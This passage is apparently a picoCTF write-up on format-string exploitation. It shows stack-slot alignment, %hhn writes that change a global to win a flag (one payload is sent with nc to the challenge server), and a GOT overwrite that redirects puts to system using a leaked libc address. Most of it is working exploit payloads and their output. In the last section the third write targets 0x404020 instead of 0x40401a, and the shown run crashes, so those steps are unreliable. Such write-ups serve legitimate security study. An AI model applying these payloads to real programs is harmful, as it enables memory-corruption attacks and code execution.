The issue with our stackpop technique is that if the address we want to overwrite contains NULL bytes, we’re stuck. In our CTF, the address of sus is 0x404060, i.e. 0x00.00.00.00.00.40.40.60 as an 8-byte slot. So knowing that 14 stackpops are required to reach our input:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AAAAAAAA"+"%lx-"*14')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AAAAAAAA7fffffffd520-[...]-0-4141414141414141-
sus = 0x21737573
You can do better!
Putting the address at the beginning breaks our payload, because printf() stops processing the format string at the first NULL byte:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"\x60\x40\x40\x00\x00\x00\x00\x00"+"%lx-"*14')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: `@@
sus = 0x21737573
You can do better!
Here, the only part of our input processed as a format string is \x60\x40\x40\x00 = "`@@".
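What printf() actually sees can be checked quickly. The snippet below is a simple illustration, assuming the format string is treated as a C string, i.e. cut at its first NULL byte; the variable names are hypothetical.

```python
payload = b"\x60\x40\x40\x00\x00\x00\x00\x00" + b"%lx-" * 14

# A C string ends at the first NULL byte: everything after it is ignored.
seen_by_printf = payload.split(b"\x00", 1)[0]
print(seen_by_printf)  # b'`@@'
```

None of the 14 specifiers survive, which is why only the three address bytes are echoed back.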
Note that using only 0x404060 (without NULL bytes) isn’t sufficient, as a stack slot is 8 bytes wide and the rest of the slot gets filled with the following characters of our string:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"\x60\x40\x40"+"%lx-"*14')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: `@@7fffffffd520-0-[...]-0-252d786c25404060-
sus = 0x21737573
You can do better!
We wanted the slot containing our address to be 404060 alone, NOT 252d786c25404060 (0x252d786c25 -> "%lx-%").
So, how can we write to addresses containing NULL bytes?
Direct Access Parameter & NULL addr !!
Suffixing Addresses’ NULLs is okay
After endless reading (here, here, or here), some workarounds exist when the address to alter contains NULL bytes:
If the only NULL byte is the lowest byte of the address, then we may shift the write to the previous adjacent address (\x00 - 1 instead of \x00). For example, if we wanted to write 0x30 into an address ending with \x00 using %hhn, we could instead write \x30?? into the previous address, ending with \xff, using %hn (where ?? will overwrite the previous byte, which gets corrupted).
Otherwise, we might put the addresses at the end of our payload, and use the Direct Access Parameter to reference them using %N$hhn.
We’re in the second scenario. Such Direct Access Parameter payloads might be less portable (especially on old systems that don’t support the %N$ specifier), but that’s our only option.
Again, our input starts at slot 14, so we might prefix a dummy string and use the Direct Access Parameter specifier to check our input is indeed at that slot:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AAAAAAAA"+"-%14$lx-"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AAAAAAAA-4141414141414141-
sus = 0x21737573
You can do better!
Also, let’s suffix our address at the end, and check we can access it accordingly:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%14$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 4060786c24343125`@@
sus = 0x21737573
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%15$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 40`@@
sus = 0x21737573
You can do better!
Hmm… As we can see, the 14th slot contains our format string in hexadecimal (0x786c24343125 -> "%14$lx") with part of our address (0x4060), while the next slot contains the other part of our address (0x40). Because we want the address to be alone in its own slot (for it to be referenced by %N$hhn), we can add 2 dummy characters "AA" at the beginning of our string to push the first 2 bytes of the address further:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AA"+"%15$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AA404060`@@
sus = 0x21737573
You can do better!
Now, our first address is correctly aligned, alone in its slot (0x404060)! Then, we can append the 3 other addresses needed to write sus. For instance, the 17th slot will contain 0x404062:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AA"+"%17$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AA404062`@@
sus = 0x21737573
You can do better!
Notice that the NULL bytes at the end of our string are indeed stored on the stack: scanf("%s") only stops at whitespace, so fortunately they don’t cut our payload short.
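The amount of dummy padding, and the slot in which the first appended address lands, can be computed rather than guessed. This is a minimal sketch, assuming 8-byte slots and an input starting at slot 14 as measured above; align_format and the constants are hypothetical names.

```python
SLOT = 8               # size of a stack slot on x86-64
FIRST_INPUT_SLOT = 14  # slot where our input starts (measured above)


def align_format(fmt, pad=b"A"):
    """Pad `fmt` to a multiple of SLOT; return it with the first address slot."""
    missing = -len(fmt) % SLOT
    padded = pad * missing + fmt
    first_addr_slot = FIRST_INPUT_SLOT + len(padded) // SLOT
    return padded, first_addr_slot


print(align_format(b"%15$lx"))  # (b'AA%15$lx', 15)
```

The addresses appended right after the padded format string then occupy consecutive slots starting at the returned index.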
Stack Misalignments
Another thing to bear in mind while writing into sus is to make sure, every time we construct our payload, that the 4 addresses at the end land exactly in their respective slots.
As we saw just above, we needed to prefix "AA"
for the addresses to be correctly stack-aligned. That's because, with this prefix, the number of characters in "AA%17$lx"
is a multiple of the size of a slot (8 * 1
).
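The alignment rule can be sketched in a few lines of Python. The helper names below (pad_to_slot, first_address_slot) are hypothetical, and the sketch assumes, as observed above, that our input starts in the 14th slot and that a slot is 8 bytes wide:

```python
SLOT_SIZE = 8   # bytes per stack slot on x86-64
BUF_SLOT = 14   # slot where our input starts in this binary (observed above)

def pad_to_slot(fmt: bytes) -> bytes:
    """Prefix fmt with dummy 'A's until its length is a multiple of a slot."""
    return b"A" * (-len(fmt) % SLOT_SIZE) + fmt

def first_address_slot(fmt: bytes) -> int:
    """Slot number of the data appended right after a slot-aligned fmt."""
    assert len(fmt) % SLOT_SIZE == 0, "format part is not slot-aligned"
    return BUF_SLOT + len(fmt) // SLOT_SIZE

print(pad_to_slot(b"%15$lx"))                      # b'AA%15$lx'
print(first_address_slot(pad_to_slot(b"%15$lx")))  # 15
```

The slot number written inside the specifier changes the length of the specifier itself, so the result should always be checked against the %N$ that was actually typed.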
For instance, let’s say we wanna write a dummy value into the first address of sus
(in the 15th slot). For that, we’ll use the %15$hhn
specifier:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%15$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
[1] 379019 segmentation fault ./vuln <<<
We have a segmentation fault :(
We can confirm that the addresses are not slot-aligned by changing %15$hhn
to %15$lx-
(which has the same length, 7 characters):
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%15$lx-"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 6100000000004040-`@@
sus = 0x21737573
You can do better!
We were not writing into 0x404060
, but into 0x6100000000004040
. So if we prefix one A
before our format string, "A%15$hhn"
has a size of 8 (a multiple of a stack slot), so our addresses are now stack-aligned:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"A%15$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: A`@@
sus = 0x21737501
You can do better!
See that we overwrote the lowest byte of sus
with 01
, the number of characters printed before the specifier: the single "A"
.
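To see where each byte of the payload lands, the slot layout can be reproduced offline. This is only a sketch: the slots() helper is hypothetical, it assumes the input starts in the 14th slot (as observed earlier), and it pads the last slot with zeros, whereas the real buffer would hold the trailing newline there:

```python
import struct

BUF_SLOT = 14  # slot where our input starts in this binary (observed earlier)

def slots(payload: bytes) -> dict:
    """Map slot number -> 64-bit little-endian value, as %N$lx would show it."""
    padded = payload + b"\x00" * (-len(payload) % 8)
    words = struct.unpack(f"<{len(padded) // 8}Q", padded)
    return {BUF_SLOT + i: word for i, word in enumerate(words)}

addresses = struct.pack("<4Q", 0x404060, 0x404061, 0x404062, 0x404063)

print(hex(slots(b"%15$lx-" + addresses)[15]))   # 0x6100000000004040 (misaligned)
print(hex(slots(b"A%15$hhn" + addresses)[15]))  # 0x404060 (aligned)
```

The misaligned value matches the one leaked above: the 7-character format string leaves one byte free in the 14th slot, so every address is shifted by one byte and the 15th slot ends with the first byte (0x61) of the second address.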
Even better, we can pad the slot number with a leading 0 in the %N$
specifier instead of printing a dummy character, which eases our future calculations:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%015$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: `@@
sus = 0x21737500
You can do better!
Finally, as our payload grows, the slot numbers of our addresses grow as well! For example, the second address (0x404061
) below is in the 16th slot:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0016$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 404061`@@
sus = 0x21737573
You can do better!
But if we add 8 characters at the beginning of our string, the address naturally moves 1 slot further (i.e. from the 16th to the 17th):
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%000000000017$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 404061`@@
sus = 0x21737573
You can do better!
sus == 0x67616c66
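Therefore, we can use all that knowledge to construct a payload that writes 0x67616c66
into sus
at 0x404060
, one byte at a time. Each %hhn stores the number of characters printed so far modulo 256, so each %c only needs to print the difference to the next byte (0x161 stands for 0x61 after wrapping around):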
jamarir@kali:~$ python -c 'print(f"+{0x66} -> +{0x6c - 0x66} -> +{0x161 - 0x6c} -> +{0x167 - 0x161}")'
+102 -> +6 -> +245 -> +6
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%16$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0`@@
sus = 0x21737566
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%18$hhn"+"%0000006c%19$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0 `@@
sus = 0x21736c66
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%20$hhn"+"%0000006c%21$hhn"+"%0000245c%22$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0 `@@
sus = 0x21616c66
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%0000102c%22$hhn"+"%0000006c%23$hhn"+"%0000245c%24$hhn"+"%0000006c%25$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0
`@@
I have NO clue how you did that, you must be a wizard. Here you go...
flagusator
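The increments used above (+102, +6, +245, +6) can be derived mechanically. The following is a minimal sketch, with a hypothetical helper name, assuming the bytes are written lowest address first with one %hhn each:

```python
def hhn_increments(value, nbytes):
    """Characters to print before each %hhn to write value's bytes, lowest first."""
    printed = 0          # running count of characters printed so far
    increments = []
    for i in range(nbytes):
        target = (value >> (8 * i)) & 0xFF
        # %hhn stores printed % 256, so wrap around when the target is lower.
        # Note: a step of 0 would need special care (e.g. printing 256 instead),
        # since %c always prints at least one character.
        step = (target - printed) % 256
        increments.append(step)
        printed += step
    return increments

print(hhn_increments(0x67616c66, 4))  # [102, 6, 245, 6]
```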
And here’s the server-side flag :D
jamarir@kali:~$ nc rhea.picoctf.net 52261 <<<$(python2 -c 'print"%0000102c%22$hhn"+"%0000006c%23$hhn"+"%0000245c%24$hhn"+"%0000006c%25$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: u `@@
I have NO clue how you did that, you must be a wizard. Here you go...
picoCTF{f0[...]cc}
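The final payload can also be assembled programmatically. This sketch (the build_payload name is hypothetical) relies on the convention used above: every %c/%hhn pair is zero-padded to exactly 16 characters, i.e. 2 slots, so with n writes the first address lands in slot 14 + 2n. It assumes two-digit slot numbers and steps below 10,000,000:

```python
import struct

BUF_SLOT = 14  # slot where our input starts in ./vuln (observed earlier)

def build_payload(increments, first_address):
    """Fixed-width %c/%hhn pairs (16 bytes each) followed by the target addresses."""
    n = len(increments)
    first_slot = BUF_SLOT + 2 * n      # each 16-byte pair occupies 2 slots
    fmt = b""
    for i, step in enumerate(increments):
        pair = f"%{step:07d}c%{first_slot + i}$hhn".encode()
        assert len(pair) == 16, "pair must stay exactly 2 slots wide"
        fmt += pair
    # One 8-byte little-endian address per byte to write.
    addresses = b"".join(struct.pack("<Q", first_address + i) for i in range(n))
    return fmt + addresses

payload = build_payload([102, 6, 245, 6], 0x404060)
print(payload[:64].decode())
# %0000102c%22$hhn%0000006c%23$hhn%0000245c%24$hhn%0000006c%25$hhn
```

Keeping every pair the same width is a design choice that makes the slot numbers predictable: adding a write always shifts the addresses by exactly 2 slots.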
Format String 3
This program doesn't contain a win function. How can you win?
Download the binary here. Download the source here. Download libc here, download the interpreter here.
Run the binary with these two files present in the same directory.
Program Execution
That's the final boss. When executed, we're asked to enter a string. Putting “test” shows:
jamarir@kali:~$ ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
test
test
/bin/sh
Libs are used locally for the program to run. Otherwise, the program cannot execute:
jamarir@kali:~$ rm -f ld-linux-x86-64.so.2 libc.so.6
jamarir@kali:~$ ./format-string-3
zsh: no such file or directory: ./format-string-3
Source Code
First, the code zero-initializes the variables all_strings
and buf
:
[...]
#define MAX_STRINGS 32
[...]
int main() {
char *all_strings[MAX_STRINGS] = {NULL};
char buf[1024] = {'\0'};
[...]
Then, it calls the setvbuf()
function on the standard streams, and prints some text, including the address of setvbuf:
[...]
void setup() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
}
void hello() {
puts("Howdy gamers!");
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}
int main() {
[...]
setup();
hello();
[...]
}
Below, we see again that a vulnerable printf()
call is performed:
int main() {
[...]
fgets(buf, 1024, stdin);
printf(buf);
[...]
}
Finally, the /bin/sh
string is written into stdout using the puts()
function:
[...]
char *normal_string = "/bin/sh";
[...]
int main() {
[...]
puts(normal_string);
[...]
}
We know the program is a 64-bit executable:
jamarir@kali:~$ file format-string-3
format-string-3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=54e1c4048a725df868e9a10dc975a46e8d8e5e92, not stripped
Therefore, we may exploit the format string bug and disclose the stack’s slots with %lx
:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%lx-"*5')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
7ffff7fb8963-fbad208b-7fffffffd6a0-1-0-
/bin/sh
PLT → GOT → system()
But what now? For some reason, the program tells us where the locally loaded libc's setvbuf()
function is. Also, the /bin/sh
string is defined globally:
#include <stdio.h>
#define MAX_STRINGS 32
char *normal_string = "/bin/sh";
So we might guess that we want to spawn a shell. But the stack isn't executable, so we can’t inject a shellcode in our input:
jamarir@kali:~$ readelf -l format-string-3
[...]
GNU_STACK 0x0000000000001000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
[...]
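Looking at the hint:
We must change a function's pointer. That's pretty clear now: we must call system("/bin/sh")
, replacing the last puts(normal_string)
with system(normal_string)
. As a quick sanity check, a standalone program calling system() does spawn a shell that runs the commands it receives on stdin: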
#include <stdlib.h>
int main() {
system("/bin/bash");
return 0;
}
jamarir@kali:~$ gcc system.c -o system
jamarir@kali:~$ echo 'whoami' |./system
jamarir
Replacing the puts
's address is possible by changing its GOT (Global Offset Table) entry. In a nutshell, when a libc function is called, the program jumps to the function's Procedure Linkage Table (PLT) entry
, which itself jumps to the address stored in the associated GOT entry:
jamarir@kali:~$ objdump -M intel -j .text -d format-string-3
[...]
4012e8: 48 8b 05 59 2d 00 00 mov rax,QWORD PTR [rip+0x2d59] # 404048 <normal_string>
4012ef: 48 89 c7 mov rdi,rax
4012f2: e8 89 fd ff ff call 401080 <puts@plt>
[...]
jamarir@kali:~$ objdump -M intel -d format-string-3
[...]
Disassembly of section .plt.got:
0000000000401070 <setvbuf@plt>:
401070: f3 0f 1e fa endbr64
401074: f2 ff 25 7d 2f 00 00 bnd jmp QWORD PTR [rip+0x2f7d] # 403ff8 <setvbuf@GLIBC_2.2.5>
40107b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
Disassembly of section .plt.sec:
0000000000401080 <puts@plt>:
401080: f3 0f 1e fa endbr64
401084: f2 ff 25 8d 2f 00 00 bnd jmp QWORD PTR [rip+0x2f8d] # 404018 <puts@GLIBC_2.2.5>
40108b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
[...]
jamarir@kali:~$ objdump --dynamic-reloc format-string-3
format-string-3: file format elf64-x86-64
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0000000000403fe8 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.34
0000000000403ff0 R_X86_64_GLOB_DAT __gmon_start__@Base
0000000000403ff8 R_X86_64_GLOB_DAT setvbuf@GLIBC_2.2.5
0000000000404060 R_X86_64_COPY stdout@GLIBC_2.2.5
0000000000404070 R_X86_64_COPY stdin@GLIBC_2.2.5
0000000000404080 R_X86_64_COPY stderr@GLIBC_2.2.5
0000000000404018 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
0000000000404020 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.4
0000000000404028 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5
0000000000404030 R_X86_64_JUMP_SLOT fgets@GLIBC_2.2.5
As we can see:
First, the <puts@plt> entry is called, making the program jump to 0x401080.
Second, this jump leads to the instruction at 0x401084. This instruction jumps to the address stored in memory at rip + 0x2f8d = 0x40108b + 0x2f8d = 0x404018 (rip already points to the next instruction, 0x40108b). It turns out that this memory location is the GOT's <puts@GLIBC_2.2.5> entry, which holds the address of puts() to be executed.
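The RIP-relative arithmetic can be checked against the raw instruction bytes from the objdump output. A small sketch (the helper name is hypothetical), assuming the 32-bit displacement starts at byte 3 of these 7-byte instructions:

```python
def rip_relative_target(insn_addr, insn_bytes, disp_offset):
    """Address referenced by a RIP-relative operand with a 32-bit displacement."""
    disp = int.from_bytes(insn_bytes[disp_offset:disp_offset + 4], "little", signed=True)
    next_insn = insn_addr + len(insn_bytes)   # rip points past the current instruction
    return next_insn + disp

# bnd jmp QWORD PTR [rip+0x2f8d] at 0x401084 (puts@plt)
puts_jmp = bytes.fromhex("f2ff258d2f0000")
print(hex(rip_relative_target(0x401084, puts_jmp, 3)))     # 0x404018

# bnd jmp QWORD PTR [rip+0x2f7d] at 0x401074 (setvbuf@plt)
setvbuf_jmp = bytes.fromhex("f2ff257d2f0000")
print(hex(rip_relative_target(0x401074, setvbuf_jmp, 3)))  # 0x403ff8
```

Both results match the comments printed by objdump and the offsets listed in the dynamic relocation records.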
Note that because we control the printf()
function, we may exploit any GOT entry call that is performed AFTERWARDS only. Here, it means that we may detour the program’s execution altering the puts()
GOT entry alone, whereas we can’t exploit an fgets()
GOT alteration:
[...]
int main() {
[...]
fgets(buf, 1024, stdin);
printf(buf);
puts(normal_string);
return 0;
}
Write Where ?
So far, we know we want to change the address that puts()
resolves to. So we want to write something into its GOT entry, at address 0x404018
.
Write What ? libc base & offsets.
Now we need to figure out what to write. We want to write the system()
’s address that’ll be used at runtime. The setvbuf()
and system()
functions, in the libc library, are at offset 0x7a3f0
and 0x4f760
respectively:
jamarir@kali:~$ nm -D libc.so.6 |grep -E ' (setvbuf|system)@'
000000000007a3f0 W setvbuf@@GLIBC_2.2.5
000000000004f760 W system@@GLIBC_2.2.5
Therefore, we know that system()
is placed 0x2ac90
before setvbuf()
. Also, considering that the setvbuf()
's address at runtime is 0x7ffff7e5a3f0
:
jamarir@kali:~$ ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
We know that the libc's base is 0x7ffff7e5a3f0 - 0x7a3f0 = 0x7ffff7de0000
. Then, if we want to write the system()
address, we can compute it either way:
0x7ffff7e5a3f0 - 0x2ac90, i.e. 0x7ffff7e2f760.
0x7ffff7de0000 + 0x4f760, i.e. 0x7ffff7e2f760.
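Both computations can be cross-checked with a few lines of Python. This is just a sketch with hypothetical names, using the two offsets reported by nm above:

```python
SETVBUF_OFFSET = 0x7a3f0   # from `nm -D libc.so.6`
SYSTEM_OFFSET = 0x4f760

def locate_system(setvbuf_leak):
    """Return (libc base, system address) from the leaked setvbuf address."""
    base = setvbuf_leak - SETVBUF_OFFSET
    assert base & 0xFFF == 0, "a libc base is expected to be page-aligned"
    via_base = base + SYSTEM_OFFSET
    via_delta = setvbuf_leak - (SETVBUF_OFFSET - SYSTEM_OFFSET)  # leak - 0x2ac90
    assert via_base == via_delta
    return base, via_base

base, system_addr = locate_system(0x7ffff7e5a3f0)
print(hex(base), hex(system_addr))  # 0x7ffff7de0000 0x7ffff7e2f760
```

The page-alignment assertion is a cheap way to catch a wrong offset or a libc that differs from the one actually loaded.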
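Finally, notice that we only need to alter the 3 lower bytes stored at 0x404018
. That's because the entry already holds a libc address (puts() has already been called once in hello()), and the upper bytes of all libc functions are the same here, i.e. 0x7ffff7??????
. Said differently, every libc symbol offset fits in at most 3 bytes, so only the 3 lower bytes differ from one libc function to another: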
jamarir@kali:~$ nm -D libc.so.6 |awk -F' ' '{print $1}' |grep -oP '^0+\K[0-9a-z]+'
3f7e0
263e1
1d9b40
[...]
111640
111640
jamarir@kali:~$ for i in $(nm -D libc.so.6 |awk -F' ' '{print $1}' |grep -oP '^0+\K[0-9a-z]+'); do
expr length $i;
done |sort -u
1
2
5
6
Basic Dummy Writing
With the following payload, we’d need 38 stackpops to reach our input:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"AAAAAAAA"+"%lx-"*38')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
AAAAAAAA7ffff7fb8963-[...]-0-4141414141414141-
/bin/sh
We wanna write 0x7ffff7e2f760
into 0x404018
. So again, we'll suffix the target addresses, keeping the necessary stack alignment in mind (e.g. %039$
):
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%039$lx-"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
404018-@@/bin/sh
We may check that each address is in its respective slot:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%041$lx-"+"%042$lx-"+"%043$lx-"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
404018-404019-404020-@@/bin/sh
Great! Let's perform our first write:
jamarir@kali:~$ ./format-string-3 <<<$(python2 -c 'print"%039$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"')
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
[1] 578627 segmentation fault ./format-string-3 <<<
We have a segmentation fault. That's most likely because our instruction pointer rip
is pointing to an area that doesn’t contain a valid instruction. In order to debug the overwritten address locally, let's first generate a core dump file:
jamarir@kali:~$ ulimit -c 100000; sudo sysctl -w kernel.core_pattern=./core
Then we trigger the above segfault again. If we open the core dump in gdb, we can inspect the overwritten GOT entry:
jamarir@kali:~$ gdb -q ./format-string-3 core.585809 2>/dev/null
[...]
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007ffff7e695fd in ?? () from ./libc.so.6
(gdb) x/2xw 0x404018
0x404018 <puts@got.plt>: 0xf7e59b00 0x00007fff
Here, we see that the puts()
’s GOT entry is set to 0x00007ffff7e59b00
, where the lowest byte has been overwritten with 0x00
(nothing was printed before %hhn, so the count is 0). We may use the following one-liner to debug the puts()
’s GOT entry more easily:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"A"+"%39$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
[...]
0x404018 <puts@got.plt>: 0xf7e59b01 0x00007fff
See that the lowest byte stored at 0x404018
is 01
, the number of characters printed before %39$hhn
: the single "A".
puts2system("/bin/sh")
Again, we wanna write 0x7ffff7e2f760
into 0x404018
. So using the following calculations:
jamarir@kali:~$ python -c 'print(f"+{0x60} -> +{0xf7 - 0x60} -> +{0x1e2 - 0xf7}")'
+96 -> +151 -> +235
We can overwrite the address:
0x404018 with the byte 0x60, printing 96 characters:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"%0000096c%40$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
[...] c@@[1] 619351 segmentation fault (core dumped) ./format-string-3 <<<
0x404018 <puts@got.plt>: 0xf7e59b60 0x00007fff
0x404019 with the byte 0xf7, printing 151 more characters:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"%0000096c%42$hhn"+"%0000151c%43$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
[...]
0x404018 <puts@got.plt>: 0xf7e5f760 0x00007fff
0x404020 with the byte 0x(1)e2, printing 235 more characters:
jamarir@kali:~$ rm -f core.* 1>/dev/null 2>/dev/null; ./format-string-3 <<<$(python2 -c 'print"%0000096c%44$hhn"+"%0000151c%45$hhn"+"%0000235c%46$hhn"+"\x18\x40\x40\x00\x00\x00\x00\x00"+"\x19\x40\x40\x00\x00\x00\x00\x00"+"\x20\x40\x40\x00\x00\x00\x00\x00"'); echo exit |gdb -q ./format-string-3 core.* -ex 'x/2xw 0x404018' 2>/dev/null |grep '^0x'
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ffff7e5a3f0
c @@*** stack smashing detected ***: terminated
[1] 627952 IOT instruction (core dumped) ./format-string-3 <<<
0x404018 <puts@got.plt>: 0xf7e5f760 0x00007fff
